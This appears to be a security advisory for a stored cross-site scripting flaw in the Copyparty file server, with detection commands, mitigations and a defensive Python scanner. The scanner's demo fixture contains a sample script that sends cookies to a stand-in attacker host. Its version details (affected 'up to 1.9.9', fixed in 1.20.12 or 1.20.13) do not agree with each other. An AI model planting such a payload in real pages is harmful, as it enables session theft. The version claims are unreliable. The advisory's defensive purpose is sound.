copyparty
Fixed in
1.20.13
1.20.12
CVE-2026-32109 describes a Cross-Site Scripting (XSS) vulnerability in Copyparty, a portable file server. An attacker who holds read and write permissions on a served folder can upload a file named .prologue.html, which Copyparty embeds into that folder's listing, and so execute arbitrary JavaScript in the browser of any user who views the listing. The vulnerability impacts Copyparty versions up to 1.9.9; a fix is available in version 1.20.12.
The injected JavaScript runs in the origin of the file server and in the victim's session, so it can hijack the session, steal credentials, redirect the victim to a phishing site, or deface the file server's interface. The attack requires read and write access to the Copyparty file storage, which limits the immediate scope, but the risk is significant wherever such access is shared widely or has been compromised. No further interaction is needed beyond the victim opening a crafted URL, since the script fires as soon as the listing is rendered.
This vulnerability was publicly disclosed on 2026-03-12. No public proof-of-concept (PoC) code has been observed at the time of writing, and the vulnerability is not currently listed in the CISA KEV catalog. The CVSS base score is 3.7 (LOW); the score rates impact and exploit preconditions, not likelihood of exploitation, which the EPSS figure below puts at 0.01%.
Organizations and individuals using Copyparty for file sharing, particularly those with shared hosting environments or where multiple users have write access to the server's file storage, are at risk. Legacy configurations with overly permissive file permissions are also a concern.
• python / server: locate uploaded prologue files in the served storage
  find /path/to/copyparty/files/ -name '.prologue.html'
• generic web: confirm whether such a file is reachable over HTTP (look at the status line and content type, then inspect the file body itself; the content type alone does not tell you whether the markup contains script)
  curl -sI https://example.com/foo/.prologue.html | grep -i -e '^HTTP/' -e 'content-type'
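The find command above only lists file names; a practitioner also wants to know which of the files actually carry active content. The following scanner is an added example written for this page, not Copyparty's own code: it walks one or more volume roots, picks out the prologue/epilogue files, and flags those containing script tags, inline event handlers, javascript: URLs or embedded frames. It assumes that Copyparty embeds both .prologue.html and its companion .epilogue.html into folder listings, and the regular expressions are a heuristic, not an HTML parser. The sample tree it builds under a temporary directory is constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Audit copyparty volume roots for .prologue.html / .epilogue.html files
and flag the ones that carry active content.

Added example for this advisory; not copyparty's own code.
Assumptions: copyparty embeds the two file names below into folder
listings, and the regexes are a heuristic rather than an HTML parser.
"""
import os
import re
import sys
import tempfile
import time

# File names copyparty embeds into a directory listing (assumption: the
# advisory names .prologue.html; .epilogue.html is its companion).
EMBED_NAMES = frozenset({".prologue.html", ".epilogue.html"})

# Markup features that execute script rather than just render.
ACTIVE_PATTERNS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "event-handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript-url": re.compile(r"javascript\s*:", re.I),
    "frame-or-object": re.compile(r"<\s*(iframe|object|embed)\b", re.I),
    "srcdoc": re.compile(r"\bsrcdoc\s*=", re.I),
}


def classify(html: str) -> list:
    """Names of the active-content patterns present in the markup."""
    return [name for name, rx in ACTIVE_PATTERNS.items() if rx.search(html)]


def scan(root: str) -> list:
    """Walk root and describe every embedded-HTML file found under it."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if name.lower() not in EMBED_NAMES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    html = fh.read(1 << 20)  # 1 MiB is plenty for a verdict
                st = os.stat(path)
            except OSError as exc:
                findings.append({"path": path, "error": str(exc),
                                 "hits": [], "active": False})
                continue
            hits = classify(html)
            findings.append({
                "path": path,
                "hits": hits,
                "active": bool(hits),
                "uid": st.st_uid,  # who owns the upload, for the audit trail
                "mtime": time.strftime("%Y-%m-%dT%H:%M:%SZ",
                                       time.gmtime(st.st_mtime)),
            })
    return findings


def demo_tree() -> str:
    """Constructed sample volume: one malicious prologue, one benign
    epilogue, and an unrelated .html file that must be ignored."""
    root = tempfile.mkdtemp(prefix="copyparty-audit-")
    sub = os.path.join(root, "pub", "sub")
    os.makedirs(sub)
    with open(os.path.join(root, "pub", ".prologue.html"), "w") as fh:
        fh.write("<h1>Welcome</h1>"
                 "<script>fetch('//attacker.example/'+document.cookie)</script>")
    with open(os.path.join(sub, ".epilogue.html"), "w") as fh:
        fh.write("<p>See the README for upload rules.</p>")
    with open(os.path.join(sub, "notes.html"), "w") as fh:
        fh.write("<script>alert(1)</script>")  # not an embedded name
    return root


def main(argv) -> int:
    roots = argv[1:] or [demo_tree()]
    active = 0
    for root in roots:
        for f in scan(root):
            status = "ACTIVE " if f["active"] else "static "
            active += f["active"]
            print(status, f["path"], ",".join(f["hits"]) or f.get("error", "-"))
    return 1 if active else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with the volume roots as arguments (`python3 audit_prologue.py /path/to/copyparty/files`); with no arguments it scans the constructed sample tree. A non-zero exit code means at least one embedded file contains active content, so the script can sit in a cron job or CI step as the recurring audit the mitigation section recommends. A static-only hit is still worth reviewing, since the heuristic will not catch every obfuscation.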
Exploit Status
EPSS
0.01% (1st percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-32109 is to upgrade Copyparty to version 1.20.12 or later, which contains the fix. If upgrading is not immediately feasible, restrict write access to the Copyparty file storage to trusted users only, and remove or quarantine any .prologue.html files that were not placed there by an administrator. A Web Application Firewall (WAF) rule that blocks uploads named .prologue.html or requests carrying suspicious URL parameters such as '?b' is a stopgap, not a fix: it does nothing about files already present, and filename or parameter filters are easy to bypass. Regularly review file server permissions and audit logs for unauthorized file uploads.
Update copyparty to version 1.20.12 or later. This version fixes the unexpected execution of JavaScript through crafted URLs.
CVE-2026-32109 is a Cross-Site Scripting (XSS) vulnerability in Copyparty versions up to 1.9.9. An attacker can upload a file and execute JavaScript via a crafted URL if they have write access.
You are affected if you are using Copyparty version 1.9.9 or earlier and have users with read/write access to the server's file storage.
Upgrade Copyparty to version 1.20.12 or later. As a temporary workaround, restrict write access and consider WAF rules.
There is no confirmed active exploitation of CVE-2026-32109 at this time, but the vulnerability is publicly known.
Refer to the Copyparty project's official website or GitHub repository for the latest security advisories and updates.